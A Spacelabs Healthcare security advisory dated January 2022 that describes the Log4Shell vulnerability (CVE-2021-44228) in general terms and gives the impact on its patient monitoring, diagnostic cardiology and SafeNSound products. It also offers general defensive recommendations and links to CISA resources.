Updated: 12 January 2022
Products Covered: Spacelabs Patient Monitoring and Diagnostic Cardiology Products

Security Advisory

“Log4Shell” Vulnerability Assessment and Potential Product Impact Statement

  1. Vulnerability Overview

Spacelabs Healthcare has been made aware of a recently published security vulnerability known as “Log4Shell” (CVE-2021-44228) that was discovered in a Java-based tool utility called Log4j used in many software applications.

The Apache Log4j utility is a commonly used component for logging requests. On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code.

On December 10, 2021, NIST published a critical Common Vulnerabilities and Exposure alert, CVE-2021-44228. More specifically, Java Naming Directory Interface (JNDI) features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from remote servers when message lookup substitution is enabled.

  1. Risk Assessment Summary

The Log4j utility performs network lookups using the Java Naming and Directory Interface (JNDI) via an integration with Lightweight Directory Access Protocol (LDAP). The vulnerability takes advantage of the way Log4j interprets a log message, and by design the tool will look up the string as a URL via JNDI and search whatever text is passed. If malicious text is passed using the ${ } syntax, execution on the passed text can occur with elevated privileges.

Spacelabs Healthcare Patient Monitoring and Connectivity (PMC) and Diagnostic (DC) products do not use the Apache Log4j utility.

Spacelabs Healthcare’s SafeNSound 4.3.1 cloud application was discovered to be impacted and was remediated December 13, 2021. Customers who are on SafeNSound 4.3.1 do not require further follow-up. Customers using other versions of SafeNSound are not impacted.

  1. Recommendations

Spacelabs recommends the following as general cybersecurity actions  to an enterprise environment.

  • Implement defense-in-depth within the enterprise environment consisting of tools such as Intrusion Detection/Prevention Systems (IDS/IPS), firewalls, and network access control (NAC).
  • Configure Intrusion Prevention System (IPS) and update the IPS rulesets to detect traffic by this vulnerability.
  • Reach out to your IPS vendor directly to ensure that the software in use by your IPS/IDS system is not affected by this same vulnerability.

IPS can show attempts of testing this vulnerability, but the IPS is not able to stop the attack from reaching your applications.

  1. Examination of Spacelabs products

 4.1 Assessment of Spacelabs Products

In response to the publication of these vulnerabilities, Spacelabs has conducted an assessment to identify devices potentially at risk to this set of vulnerabilities. Please note information is subject to change as the situation evolves.

Patient Monitoring and Connectivity (PMC) Products

Product Host Operating System Impact Assessment
XprezzNet 96190 Windows Server 2008
Windows Server 2012 R2
Windows Server 2016
Not impacted
Intesys Clinical Suite (ICS) Windows Server 2008
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Not impacted
Intesys Clinical Suite (ICS) Clinical Access Workstations Windows 7
Windows 8.1
Windows 10
Not impacted
Xhibit Telemetry Receiver (XTR) 96280 Windows Embedded Standard 7 SP1

Windows 10 IoT Enterprise Version 1809

Not impacted
Xhibit 96102 / XC4 96501 Windows Embedded Standard 7 SP1

Windows 10 IoT Enterprise Version 1809

Not impacted
Bedside Monitors
– Xprezzon 91393
– Qube 91390
– Qube Mini 91389
– Ultraview SL  91367, 91369, 91370, and 91387
VxWorks 6.6 Not impacted
DM3, DM4 monitors Windows CE Not impacted

Diagnostic Cardiology (DC) Products

Product Host Operating System Impact Assessment
Sentinel Windows 7
Windows 10
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Not impacted
Pathfinder SL Windows 7

Windows 10

Not impacted
Lifescreen Pro Windows 10 Not impacted
Lifecard CF No OS Not impacted
EVO No OS Not impacted
Eclipse Pro No OS Not impacted
CardioExpress SL6A  / SL12A Embedded OS (uC/OS II V2.84) Not impacted
CardioExpress SL18A Embedded OS (Linux Kernel 2.6.35.3) Not impacted
ABP
OnTrak
90217A
90207
No OS Not impacted

Safe-N-Sound (SNS)

Product Host Operating System Impact Assessment
Spacelabs Cloud Varies Not impacted
SafeNSound Not applicable Version >4.3.1 – Not impacted

Version 4.3.1 – Impacted and remediated for all customers by December 13, 2021

  1. Additional Resources
# Resource URL
1 Apache Log4j Webpage https://logging.apache.org/log4j/2.x/security.html
2 Statement from CISA Director Easterly on “Log4j” Vulnerability https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability
3 CISA Known Exploited Vulnerabilities Catalog (expanded to include CVE-2021-44228) https://www.cisa.gov/known-exploited-vulnerabilities-catalog
4 CISA Multinational Joint Cybersecurity Advisory on Mitigating Log4Shell and Other Log4j-Related Vulnerabilities https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

Terms of Use

The information presented above is subject to change without notice. In no event will Spacelabs or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, even if Spacelabs or its suppliers have been advised of the possibility of such damages.

Related Resources: